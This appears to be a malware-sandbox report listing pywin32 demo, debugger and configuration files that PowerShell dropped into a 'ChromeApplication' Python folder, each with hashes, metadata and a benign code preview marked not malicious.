                                                                                                                                                                                                  Preview:# Ported from the win32 and MFC OpenGL Samples...import sys..from pywin.mfc import docview..try:. from OpenGL.GL import * # nopycln: import. from OpenGL.GLU import * # nopycln: import.except ImportError:. print("The OpenGL extensions do not appear to be installed."). print("This Pythonwin demo can not run"). sys.exit(1)..import timer.import win32api.import win32con.import win32ui..PFD_TYPE_RGBA = 0.PFD_TYPE_COLORINDEX = 1.PFD_MAIN_PLANE = 0.PFD_OVERLAY_PLANE = 1.PFD_UNDERLAY_PLANE = -1.PFD_DOUBLEBUFFER = 0x00000001.PFD_STEREO = 0x00000002.PFD_DRAW_TO_WINDOW = 0x00000004.PFD_DRAW_TO_BITMAP = 0x00000008.PFD_SUPPORT_GDI = 0x00000010.PFD_SUPPORT_OPENGL = 0x00000020.PFD_GENERIC_FORMAT = 0x00000040.PFD_NEED_PALETTE = 0x00000080.PFD_NEED_SYSTEM_PALETTE = 0x00000100.PFD_SWAP_EXCHANGE = 0x00000200.PFD_SWAP_COPY = 0x00000400.PFD_SWAP_LAYER_BUFFERS = 0x00000800.PFD_GENERIC_ACCELERATED = 0x00001000.PFD_DEPTH_DONTCARE = 0x20000000.PFD_DOUBLEBUFFER_DONTCARE = 0x40000000.PFD_STEREO_D

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\progressbar.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2470
                                                                                                                                                                                                  Entropy (8bit):4.7309423091111595
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:WOXUCKcgTo9kA+TqAT1h+HXGmzVJ8ZYLhWHVzrz+H5npLoIT:wT+7TXl8Z3uL9T
                                                                                                                                                                                                  MD5:55B794C6746C1ED94E8D09FC411B4094
                                                                                                                                                                                                  SHA1:777B1AF92BE4692D65F57A439E7D54A82073D9B0
                                                                                                                                                                                                  SHA-256:4DD947D0B90B6CB2EDFCF5B8A4429EC13D58ABEB8C33CD8800536B5D8029D725
                                                                                                                                                                                                  SHA-512:9141BF61AAB9DFDD8777E3114FBB1625CE7A20295A96409521D2503AC276EAC4D1C15F1339DBB22D2E959157D557C5F5758689D9E8860E24DDE382537D77FAB9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# Progress bar control example.#.# .PyCProgressCtrl encapsulates the MFC CProgressCtrl class. To use it,.# .you:.#.# .- Create the control with win32ui.CreateProgressCtrl().# .- Create the control window with PyCProgressCtrl.CreateWindow().# .- Initialize the range if you want it to be other than (0, 100) using.# . PyCProgressCtrl.SetRange().# .- Either:.# . - Set the step size with PyCProgressCtrl.SetStep(), and.# . - Increment using PyCProgressCtrl.StepIt().# . or:.# . - Set the amount completed using PyCProgressCtrl.SetPos().#.# Example and progress bar code courtesy of KDL Technologies, Ltd., Hong Kong SAR, China..#..import win32con.import win32ui.from pywin.mfc import dialog...def MakeDlgTemplate():. style = (. win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). cs = win32con.WS_CHILD | win32con.WS_VISIBLE.. w = 215. h = 36.. d

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\sliderdemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2191
                                                                                                                                                                                                  Entropy (8bit):4.850454871968149
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ObpYmP20TqATZmgHqKG7nJ6XlcMKJC7yN2VpXfCpk80Don:Obpv07JIxgC7yNV0Don
                                                                                                                                                                                                  MD5:33C1937B141288687F5B1C16FE3096E6
                                                                                                                                                                                                  SHA1:FA6D59C5341185E45E9BC2D46C9BF739DDDCE239
                                                                                                                                                                                                  SHA-256:D58A77874F80AF628C9AC2A2901FDC9E6A2662A302F7068B59091472BC07CC8E
                                                                                                                                                                                                  SHA-512:7BA2215F1626FA752D46F1F73D5D13FD10600A8653901002F32AE94BB3301B85912E60B31D12AD24ACC98322AEA8910CB4D2EAF7B8472DE97F3B613433524296
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# sliderdemo.py.# Demo of the slider control courtesy of Mike Fletcher...import win32con.import win32ui.from pywin.mfc import dialog...class MyDialog(dialog.Dialog):. """. Example using simple controls. """.. _dialogstyle = (. win32con.WS_MINIMIZEBOX. | win32con.WS_DLGFRAME. | win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). _buttonstyle = (. win32con.BS_PUSHBUTTON. | win32con.WS_TABSTOP. | win32con.WS_CHILD. | win32con.WS_VISIBLE. ). ### The static template, contains all "normal" dialog items. DIALOGTEMPLATE = [. # the dialog itself is the first element in the template. ["Example slider", (0, 0, 50, 43), _dialogstyle, None, (8, "MS SansSerif")],. # rest of elements are the controls within the dialog. # standard "Close" button. [128, "Close", win32con.I

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\splittst.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2847
                                                                                                                                                                                                  Entropy (8bit):4.889392873931691
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:tn2i6rCuuHYZYShNY9qG+CWclj3hlj3Zlj3YtVrbSTziVfudj1dKKTMH8jRH94wS:p6rCu+YUlhWcPXGOPiVfudjmKTMcjRd6
                                                                                                                                                                                                  MD5:15A3380DB3440FCC03C11FEF948C3FD0
                                                                                                                                                                                                  SHA1:9C618E91EB3D4633B1E65790BC001BD11340F782
                                                                                                                                                                                                  SHA-256:8596A440DBDF0B5982E29C1B04D504904411A76AA432CD61FA502EDD05D4BCC1
                                                                                                                                                                                                  SHA-512:0A89815554A35E8BA9CF44D21081738BE1C936F46D8A26EF46D95BB6F8C35FF058F1082571C6F1AFC0F458B6F8184CF8DA617F144A33302AE8EE47C9CD55988B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import commctrl.import fontdemo.import win32ui.from pywin.mfc import docview, window..# derive from CMDIChild. This does much work for us....class SplitterFrame(window.MDIChildWnd):. def __init__(self):. # call base CreateFrame. self.images = None. window.MDIChildWnd.__init__(self).. def OnCreateClient(self, cp, context):. splitter = win32ui.CreateSplitter(). doc = context.doc. frame_rect = self.GetWindowRect(). size = ((frame_rect[2] - frame_rect[0]), (frame_rect[3] - frame_rect[1]) // 2). sub_size = (size[0] // 2, size[1]). splitter.CreateStatic(self, 2, 1). self.v1 = win32ui.CreateEditView(doc). self.v2 = fontdemo.FontView(doc). # CListControl view. self.v3 = win32ui.CreateListView(doc). sub_splitter = win32ui.CreateSplitter(). # pass "splitter" so each view knows how to get to the others. sub_splitter.CreateStatic(splitter, 1, 2). sub_splitter.CreateView(sel

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\threadedgui.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6272
                                                                                                                                                                                                  Entropy (8bit):4.87279010428793
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ncGYnTdMrmBZhpazipGrwpWSnTG3zXSjS+Opwy8nt:nAnZcziMrwZnuCu+Opgt
                                                                                                                                                                                                  MD5:DB53EA29EFF3B56F84E93B6500013F19
                                                                                                                                                                                                  SHA1:108322107120E73C4A6F949C702B6085A13DC656
                                                                                                                                                                                                  SHA-256:73E54A6C2971411F6DF38DECD4C1AB079552C746502DEBBEE2463078D3FF200F
                                                                                                                                                                                                  SHA-512:9D4A4F575106826762235A447C13509638CFC9A153EFC2AC168C9F4F413B0B12576B24312A170B9E8F61DE7F99A3EC5E363A8B8236DF8CE42927AEEA5D57AB00
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Demo of using just windows, without documents and views...# Also demo of a GUI thread, pretty much direct from the MFC C++ sample MTMDI...import timer.import win32api.import win32con.import win32ui.from pywin.mfc import docview, thread, window.from pywin.mfc.thread import WinThread..WM_USER_PREPARE_TO_CLOSE = win32con.WM_USER + 32..# font is a dictionary in which the following elements matter:.# (the best matching font to supplied parameters is returned).# name..string name of the font as known by Windows.# size..point size of font in logical units.# weight..weight of font (win32con.FW_NORMAL, win32con.FW_BOLD).# italic..boolean; true if set to anything but None.# underline.boolean; true if set to anything but None...# This window is a child window of a frame. It is not the frame window itself..class FontWindow(window.Wnd):. def __init__(self, text="Python Rules!"):. window.Wnd.__init__(self). self.text = text. self.index = 0. self.incr = 1.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\toolbar.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3165
                                                                                                                                                                                                  Entropy (8bit):4.871556617087529
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:s4IYirHY+7WzAAgDnqOYEZYR0QY1xeE4k7EMvHYq1lwOQdT5FpxYEGHBmyQLRu:0DY+qzuQR0QY1xTvYnbn1DABn0U
                                                                                                                                                                                                  MD5:96A780B1A5ECABF83F6EF7F4E719D706
                                                                                                                                                                                                  SHA1:DBC0202653E6347FB5CF4E3A76D61DF2762D7264
                                                                                                                                                                                                  SHA-256:C294B740EB59DBA1E53651856CA54B1010EAE6320DD500D9850A12D488100DA9
                                                                                                                                                                                                  SHA-512:C241101159235C880F0C3ED382BC7E3498C446B3F365D5BA09870E40C84859553FC5BF033A15817FA628A97E1412615EA63211DA427E80727C7B35B87678EA5A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Demo of ToolBars..# Shows the toolbar control..# Demos how to make custom tooltips, etc...import commctrl.import win32api.import win32con.import win32ui.from pywin.mfc import afxres, docview, window...class GenericFrame(window.MDIChildWnd):. def OnCreateClient(self, cp, context):. # handlers for toolbar buttons. self.HookCommand(self.OnPrevious, 401). self.HookCommand(self.OnNext, 402). # Its not necessary for us to hook both of these - the. # common controls should fall-back all by themselves.. # Indeed, given we hook TTN_NEEDTEXTW, commctrl.TTN_NEEDTEXTA. # will not be called.. self.HookNotify(self.GetTTText, commctrl.TTN_NEEDTEXT). self.HookNotify(self.GetTTText, commctrl.TTN_NEEDTEXTW).. # ..parent = win32ui.GetMainFrame(). parent = self. style = (. win32con.WS_CHILD. | win32con.WS_VISIBLE. | afxres.CBRS_SIZE_DYNAMIC. | afxres.CBRS_TOP. | a

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\IDLE.cfg

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):742
                                                                                                                                                                                                  Entropy (8bit):4.500440373386235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1Si9ycCnLZTIDCoc9GrGFZA1ZSfuQ9UewZdfxR2sKVLm7BeXjZrAwEkTBAL:1SifyN0DBc9GSs+9uxxQsKVLmyjZLpTq
                                                                                                                                                                                                  MD5:FEA3E78BE03619E62D9D0596B3D30415
                                                                                                                                                                                                  SHA1:643A8486EFCA63316325B666A8F2660D9BF15DBD
                                                                                                                                                                                                  SHA-256:09CD334BBD8A9723360913DB63E1DD344BB5FAEACDA270B57529C0DA3B8AF73E
                                                                                                                                                                                                  SHA-512:3DA8A6CBA89649A561274091387F8D2CB574BB69A4184B3E8F2E16513BCD7FC7B40D8C5212FE67B22753A0604670C06A82CF0A62024D21DE6AA4A272D0E05D87
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:[General].# We base this configuration on the default config..# You can list "Based On" as many times as you like.Based On = default..[Keys].# Only list keys different to default..# Note you may wish to rebind some of the default.# Pythonwin keys to "Beep" or "DoNothing"..Alt+L = LocateSelectedFile.Ctrl+Q = AppExit..# Other non-default Pythonwin keys.Alt+A = EditSelectAll.Alt+M = LocateModule..# Movement.Ctrl+D = GotoEndOfFile..# Tabs and other indent features.Alt+T = <<toggle-tabs>>.Ctrl+[ = <<indent-region>>.Ctrl+] = <<dedent-region>>..[Keys:Interactive].Alt+P = <<history-previous>>.Alt+N = <<history-next>>..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\debugger\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3160
                                                                                                                                                                                                  Entropy (8bit):4.508513007580098
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:kb4rODdJujfsRxdCEY0P+Vj8u8x4TMyRlSiRlb9YHtGDWcXGZya5mx+Jj:kbCeujfsRxdCEY0PW8uK4T/RlSiRlb9I
                                                                                                                                                                                                  MD5:41C91B0140813BC8CC87C26CF7DD98BD
                                                                                                                                                                                                  SHA1:6E7F6FF9B6802ADAE1DB64823F8C9CD46B92302D
                                                                                                                                                                                                  SHA-256:E4CC4A2BE360D6CA1A2BF73A7C52210BE5FCFE15AF1381FB2347C8E66A2A71B0
                                                                                                                                                                                                  SHA-512:26B4ADEA5C66DE0AFBEC831189A8EED366E1F3CFB4E01BA9CA50F37DD32C4B7A362A80943BADD67F7CFBC6542AA2B9B3B00002EB727AC54DCC1F31F986243470
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import sys...# Some cruft to deal with the Pythonwin GUI booting up from a non GUI app..def _MakeDebuggerGUI():. app.InitInstance()...isInprocApp = -1...def _CheckNeedGUI():. global isInprocApp. if isInprocApp == -1:. import win32ui.. isInprocApp = win32ui.GetApp().IsInproc(). if isInprocApp:. # MAY Need it - may already have one. need = "pywin.framework.app" not in sys.modules. else:. need = 0. if need:. import pywin.framework.app.. from . import dbgpyapp.. pywin.framework.app.CreateDefaultGUI(dbgpyapp.DebuggerPythonApp).. else:. # Check we have the appropriate editor. # No longer necessary!. pass. return need...# Inject some methods in the top level name-space..currentDebugger = None # Wipe out any old one on reload....def _GetCurrentDebugger():. global currentDebugger. if currentDebugger is None:. _CheckNeedGUI(). from . import debugger.. currentDebugger =

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\debugger\configui.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1183
                                                                                                                                                                                                  Entropy (8bit):4.732521227343416
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:btWt6PTAxA5/Hpnz2AwEHAhryUHbAdPevN7ylHS9ei2:Y6PTwmnz2Aw6AhryUskl7iHS9ei2
                                                                                                                                                                                                  MD5:9F30DCEE5A9761D1972B9F613F932C50
                                                                                                                                                                                                  SHA1:AABB67A2926A7091D4ECCF9AFB3FADB50A8B690B
                                                                                                                                                                                                  SHA-256:D870FBD44C3969CA82BE1260B66C92DFE6EDFFB4F87D23506E0640D103E03C7F
                                                                                                                                                                                                  SHA-512:70B36C0493DB7D575CD455F693679111F6F4F59F33BD7B663D9FCF9C09AC72C013E5CE34869D62F45C7840F573DB60DDE332EDC1EE6F199ECE71D170E93477B0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32ui.from pywin.mfc import dialog..from . import dbgcon...class DebuggerOptionsPropPage(dialog.PropertyPage):. def __init__(self):. dialog.PropertyPage.__init__(self, win32ui.IDD_PP_DEBUGGER).. def OnInitDialog(self):. options = self.options = dbgcon.LoadDebuggerOptions(). self.AddDDX(win32ui.IDC_CHECK1, dbgcon.OPT_HIDE). self[dbgcon.OPT_STOP_EXCEPTIONS] = options[dbgcon.OPT_STOP_EXCEPTIONS]. self.AddDDX(win32ui.IDC_CHECK2, dbgcon.OPT_STOP_EXCEPTIONS). self[dbgcon.OPT_HIDE] = options[dbgcon.OPT_HIDE]. return dialog.PropertyPage.OnInitDialog(self).. def OnOK(self):. self.UpdateData(). dirty = 0. for key, val in list(self.items()):. if key in self.options:. if self.options[key] != val:. self.options[key] = val. dirty = 1. if dirty:. dbgcon.SaveDebuggerOptions(self.options). # If there is a debugger open, then set

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\debugger\dbgcon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):845
                                                                                                                                                                                                  Entropy (8bit):5.242340248921855
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8N3bW3FrvlwGPFjRTRPZgpXe5e6gewNhdintvgj:OW3FrvKWjRTRPQXF6DWhdita
                                                                                                                                                                                                  MD5:8A390D63882C0842EAC376270BFF2C53
                                                                                                                                                                                                  SHA1:C6B8A92591B61DDD2FA043FA8503E56630DC23F3
                                                                                                                                                                                                  SHA-256:E4705329844F721A47F176046BF9DFFD9BA11519E19F83361F88D3679610F7DD
                                                                                                                                                                                                  SHA-512:5350F07516A87D879C61B122671EA9DF0CA115A795EC6AB18230A8F87059F7A8EEA2A00FEBC40A38AF699AA464B04A9BDB5BA67D1A03B19BD5BC31335689316A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# General constants for the debugger..DBGSTATE_NOT_DEBUGGING = 0.DBGSTATE_RUNNING = 1.DBGSTATE_BREAK = 2.DBGSTATE_QUITTING = 3 # Attempting to back out of the debug session...LINESTATE_CURRENT = 0x1 # This line is where we are stopped.LINESTATE_BREAKPOINT = 0x2 # This line is a breakpoint.LINESTATE_CALLSTACK = 0x4 # This line is in the callstack...OPT_HIDE = "hide".OPT_STOP_EXCEPTIONS = "stopatexceptions"..import win32api.import win32ui...def DoGetOption(optsDict, optName, default):. optsDict[optName] = win32ui.GetProfileVal("Debugger Options", optName, default)...def LoadDebuggerOptions():. opts = {}. DoGetOption(opts, OPT_HIDE, 0). DoGetOption(opts, OPT_STOP_EXCEPTIONS, 1). return opts...def SaveDebuggerOptions(opts):. for key, val in opts.items():. win32ui.WriteProfileVal("Debugger Options", key, val).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\debugger\dbgpyapp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1558
                                                                                                                                                                                                  Entropy (8bit):4.832730052620307
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:tsLtgxWvUmdvRsiZwAotaXzduXj7/2X0yKRluFrDLJ43iKMrGhgZ4CFLt4Bs21Hx:eLtgovUmdvCUyIWjhpaApMrGVWes2fD
                                                                                                                                                                                                  MD5:70ADAC0737589A094E215E979EF710B9
                                                                                                                                                                                                  SHA1:265D1CD5DD7AA08406D50877273C8897ECBA3B16
                                                                                                                                                                                                  SHA-256:FACDCAA49A31941B165DC13D8874AD9660D8D3505443C36C92C8C79219FB225D
                                                                                                                                                                                                  SHA-512:14BEBA71693E8B17E945E89727CBC1A9978E43C6288CDF49F751EEB563AD65A50F85032C44D0C23414F2A2AD9A149498315DD3CAE31E5C9B9D9809D3FE6E97F3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# dbgpyapp.py - Debugger Python application class.#.import sys..import win32con.import win32ui.from pywin.framework import intpyapp..version = "0.3.0"...class DebuggerPythonApp(intpyapp.InteractivePythonApp):. def LoadMainFrame(self):. "Create the main applications frame". self.frame = self.CreateMainFrame(). self.SetMainFrame(self.frame). self.frame.LoadFrame(win32ui.IDR_DEBUGGER, win32con.WS_OVERLAPPEDWINDOW). self.frame.DragAcceptFiles() # we can accept these.. self.frame.ShowWindow(win32con.SW_HIDE). self.frame.UpdateWindow().. # but we do rehook, hooking the new code objects.. self.HookCommands().. def InitInstance(self):. # Use a registry path of "Python\Pythonwin Debugger. win32ui.SetAppName(win32ui.LoadString(win32ui.IDR_DEBUGGER)). win32ui.SetRegistryKey("Python %s" % (sys.winver,)). # We _need_ the Scintilla color editor.. # (and we _always_ get it now :-).. numMRU

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\debugger\debugger.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):37931
                                                                                                                                                                                                  Entropy (8bit):4.58728413955318
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:0T7LEoH5gnkC0sYIEo9YkwmfSQpKqTTDZ3rys4odsZ+wBF9nACwDJC:87LEoZFCEElysb+BFGw
                                                                                                                                                                                                  MD5:D299576416220004127894111BCFE164
                                                                                                                                                                                                  SHA1:14875221C32AD621F20CDCA4A3295F72DE363E8E
                                                                                                                                                                                                  SHA-256:0EB3E80F49D813EFF4F4861C9F9D47B2D0355019127789620D1DC2715E2321FA
                                                                                                                                                                                                  SHA-512:C08D46D9DF477B63E09D81EDAAB2E84E50541C9AACDFF99FC91563BB93E1075D0A380E7720C681677C7E7897F7AF594A335B1B6F1F67A5564E1466787838B20E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# debugger.py..# A debugger for Pythonwin. Built from pdb...# Mark Hammond (MHammond@skippinet.com.au) - Dec 94...# usage:.# >>> import pywin.debugger.# >>> pywin.debugger.GetDebugger().run("command")..import bdb.import os.import pdb.import string.import sys.import traceback.import types..import commctrl.import pywin.docking.DockingBar.import win32api.import win32con.import win32ui.from pywin.framework import app, editor, interact, scriptutils.from pywin.framework.editor.color.coloreditor import MARKER_BREAKPOINT, MARKER_CURRENT.from pywin.mfc import afxres, dialog, object, window.from pywin.tools import browser, hierlist..# import win32traceutil.if win32ui.UNICODE:. LVN_ENDLABELEDIT = commctrl.LVN_ENDLABELEDITW.else:. LVN_ENDLABELEDIT = commctrl.LVN_ENDLABELEDITA..from .dbgcon import *..error = "pywin.debugger.error"...def SetInteractiveContext(globs, locs):. if interact.edit is not None and interact.edit.currentView is not None:. interact.edit.currentView.SetContext(

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\debugger\fail.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):927
                                                                                                                                                                                                  Entropy (8bit):4.475632683391388
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:i/hppkcl/DSHG0mlHFpi67XjfRkDWyFX6SV8Oj8afFIC25+8I/gW2cTpUmY56iuM:QGclbWGdL1L8X1FICAgdXNUaEJ
                                                                                                                                                                                                  MD5:95B368EE7CF24DEE9C9BC5FC32400324
                                                                                                                                                                                                  SHA1:F78E46CE77E7CAE1241C9A8C7EE21C0DB66E9114
                                                                                                                                                                                                  SHA-256:E574D52E789A404DB2020B67F8B0178DA3F030991A7941EAA6483BAAE91438B5
                                                                                                                                                                                                  SHA-512:1781ABD39FACA0094650813025DDB281C2363CDE64BFE875D9E8964EEAAEFC6DDE4F5B8F997A7C0DA0DCB4A0925F2C34716D0652DC34E7FD0FFDD41AAFE9A9AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# NOTE NOTE - This module is designed to fail!.#.# The ONLY purpose for this script is testing/demoing the.# Pythonwin debugger package...# It does nothing useful, and it even doesnt do that!..import sys.import time..import pywin.debugger...def a():. a = 1. try:. b(). except:. # Break into the debugger with the exception information.. pywin.debugger.post_mortem(sys.exc_info()[2]). a = 1. a = 2. a = 3. a = 4...def b():. b = 1. pywin.debugger.set_trace(). # After importing or running this module, you are likely to be. # sitting at the next line. This is because we explicitely. # broke into the debugger using the "set_trace() function. # "pywin.debugger.brk()" is a shorter alias for this.. c()...def c():. c = 1. d()...def d():. d = 1. e(d). raise ValueError("Hi")...def e(arg):. e = 1. time.sleep(1). return e...a().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\default.cfg

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6785
                                                                                                                                                                                                  Entropy (8bit):4.800464733521227
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:mQScOaWjg912oOtOEaRt+JXsI9XIz9XI39ncAhMQi0T:lS2hOtOlt+J8I9XIz9XI3Rc4i0T
                                                                                                                                                                                                  MD5:DAD8AB84C464034B2AE584DD6B55D69C
                                                                                                                                                                                                  SHA1:101480A5142B768286C0242154DB25FF83843077
                                                                                                                                                                                                  SHA-256:1B9E8359F3A056305B8D251B5017CA2F952AFB420C1BE6A3FF7D5BB7F5F6B19F
                                                                                                                                                                                                  SHA-512:46F72D3CE370BB18005DECC44D9E56D08FCB62B8B24C11A48BAA26CCDA81B3B340D9D5CF9696BC7FA5CEFD36A534126235BF180515F54378ABFD504D54590724
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# The default keyboard etc configuration file for Pythonwin..#.# The format of this file is very similar to a Windows INI file..# Sections are identified with [Section] lines, but comments.# use the standatd Python # character. Depending on the section,.# lines may not be in the standard "key=value" format...# NOTE: You should not need to modify this file..# Simply create a new .CFG file, and add an entry:.# [General].# BasedOn = Default.#.# and add your customisations. Then select your new configuration .# from the Pythonwin View/Options/Editor dialog..# This way you get to add your own customisations,.# but still take advantage of changes to the default.# configuration in new releases...# See IDLE.cfg for an example extension configuration..#.##########################################################################..[IDLE Extensions]..# The list of IDLE extensions to load. The extensions.# AutoIndent, AutoFormat and possibly others are.# "built-in", so do not need specifying...F

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\dialogs\ideoptions.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5034
                                                                                                                                                                                                  Entropy (8bit):4.737064457897206
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:wmydTwuaTLjsiaT7uPvy+6NmwunRwm1kA31J5:wRPaT5aT8v16C/
                                                                                                                                                                                                  MD5:F111572B3FB1BC661E1E6DF5A9CF879D
                                                                                                                                                                                                  SHA1:A41173D1F88C61C3237248B097B2EFB08F5E25ED
                                                                                                                                                                                                  SHA-256:62A1EEEBB052D688D023D7520A7792617C2C52B25DC8B0DE985CA5B3AAB0C563
                                                                                                                                                                                                  SHA-512:C91478BF2173956F70A46FE7DA7D8E079356F94F16E7DCDD52377E29CF0FC0AE202908118DA9BFC1680C86A59FC227DE90E17E61B8730E45686CBDA6BD3187C6
                                                                                                                                                                                                  Malicious:false
